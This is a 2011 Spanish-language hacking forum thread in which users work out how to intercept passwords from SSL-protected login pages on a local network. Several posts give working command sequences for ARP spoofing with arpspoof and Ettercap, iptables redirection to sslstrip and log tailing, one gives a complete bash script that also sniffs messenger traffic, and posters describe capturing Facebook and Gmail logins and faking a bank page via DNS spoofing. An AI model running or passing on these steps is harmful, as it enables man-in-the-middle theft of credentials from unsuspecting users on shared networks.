Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: SokarTefnut en 6 Marzo 2011, 22:23 pm



Título: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: SokarTefnut en 6 Marzo 2011, 22:23 pm
Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.

Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz.

Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo.
Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado.
Gracias por cualquier ayuda o sugerencia.


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: y0g-s0th0th en 7 Marzo 2011, 01:37 am
con ettercap podes pero el certificado q genera, al ser falso, causa una alerta en el navegador del objetivo. lo mejor es usar sslstrip.


saludos


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: SokarTefnut en 7 Marzo 2011, 11:06 am
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
     (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
     manera,estaremos transparentes para la victima,que podrá logearse
     sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo





Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: y0g-s0th0th en 7 Marzo 2011, 19:16 pm
si, creo q esta todo. si tenes problemas avisa q tengo algun tuto armado x ahi.


saludos


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: SokarTefnut en 8 Marzo 2011, 09:12 am
No logro capturar nada, ni con el procedimiento explicado anteriormente, el archivo de captura se crea, pero siempre queda vacio, algo falla.

El ARP spoofing funciona correctamente, si miro la caché ARP de la víctima, me aparecen las MAC direccionadas hacia la maquina atacante, tanto ésta como el server.

¿ No es necesario direccionar el SSLSTRIP hacia la interfaz de red en uso ? (En mi caso eth0)


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: y0g-s0th0th en 9 Marzo 2011, 01:27 am
no, asi deberia funcionar. seguro q haces bien el envenenamiento?

con ettercap q te pasaba? capturabas bien passes de texto plano? proba con ettercap sino en lugar de arpspoof a ver q pasa.


saludos


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: valdomero en 24 Marzo 2011, 18:56 pm
Hola.
He probado el backtrack 4 y usado el sslstrip consiguiendo sacar mi clave . Lo que ocurre es que cuando entro en el correo de forma directa ( sin meter la contraseña ) solo consigo ver el correo pero no la clave. Hay alguna forma de interpretar los datos cifrados que me aparecen en el sslstrip.
Saludos


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: EvilGoblin en 29 Marzo 2011, 21:15 pm
En el logeo automatico puede que se dirija directamente con https://

Lo que puedes hacer es matar ese proceso, (cortar la comunicacion)

para que tenga que volverse a conectar.

yo lo probe con facebook, gmail y otras cuentas y funciona lo mas bien.


con cuentas de banco (ejem: visa) no logre que funcione. directamente tiene que ser si o si https: certificado por ellos.

la unica forma es DNSarp. crear una pagina falsa y redirigir el trafico a tu pagina (si solicita visa en este caso)

asi si lo logre, pero no logre que se vea bien la pagina xD :P pero es safable.


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: valdomero en 30 Marzo 2011, 00:33 am
gracias EvilGoblin
He usado este comando /etc/rc.d/init.d/network restart , pero no he conseguido nada, claro que puede ser porque unos de los pc tiene windows. Si es por eso cual seria el comando en linux para reiniciar la conexion en mi torre que tiene xp
Saludos


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: xexudj89 en 28 Abril 2011, 11:35 am
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
     (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
     manera,estaremos transparentes para la victima,que podrá logearse
     sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo





se podria hacer para que lo haga con toda la red a la vez o solo se puede con un pc a la vez??


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: UsuarioEquis en 5 Mayo 2011, 03:11 am
Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.

Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh
y por ultimo #./snifeototal.sh, espero que te sirva.

texto a copiar:

echo
echo "Full Sniffing-----------------"
echo "-------------by Usuario Equis"
echo
echo -n "Adaptador de RED: "
read -e ADAPT
echo -n "Puerta de Enlace o Gateway: "
read -e GATEW
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log
sleep 1
iptables -t nat -L -n
sleep 1
iptables -t nat -D PREROUTING 1
iptables -t nat -D PREROUTING 1
iptables -t nat -L -n
sleep 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j  REDIRECT --to-port 10000
xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log
sleep 1
xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log
xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log
xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT



 


Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma?
Publicado por: Hwftk en 18 Septiembre 2011, 23:44 pm
Hay un problema con Ettercap y Sslstrip, al ejecutar Sslstrip saltan demasiados errores y pasa lo mismo con Ettercap con un archivo lipcap y demás sockers, le pasa a alguien también? Saludos


Título: Re.
Publicado por: alpha015 en 19 Septiembre 2011, 14:57 pm
Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se descifrarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo.


Título: Re: Re.
Publicado por: Uxio en 21 Septiembre 2011, 23:23 pm
Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se descifrarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo.

Añado a tu perfecta guía que los paquetes obtenidos puedes abrirlos con el ettercap (tiene una opción para analizar paquetes ya capturados), que ya tiene varios filtros para devolver passwords y nombres de usuario.


Título: Re: Re.
Publicado por: alpha015 en 22 Septiembre 2011, 01:41 am
tu perfecta guía

Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos.


Título: Re: Re.
Publicado por: Uxio en 22 Septiembre 2011, 14:32 pm
Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos.

Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa.

A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal.


Título: Re: Re.
Publicado por: alpha015 en 23 Septiembre 2011, 20:25 pm
Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa.

A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal.

Perdona no sabía, gracias pues... saludos.


Título: Re: Re.
Publicado por: Uxio en 23 Septiembre 2011, 21:00 pm
Perdona no sabía, gracias pues... saludos.

Ok, no hay problema.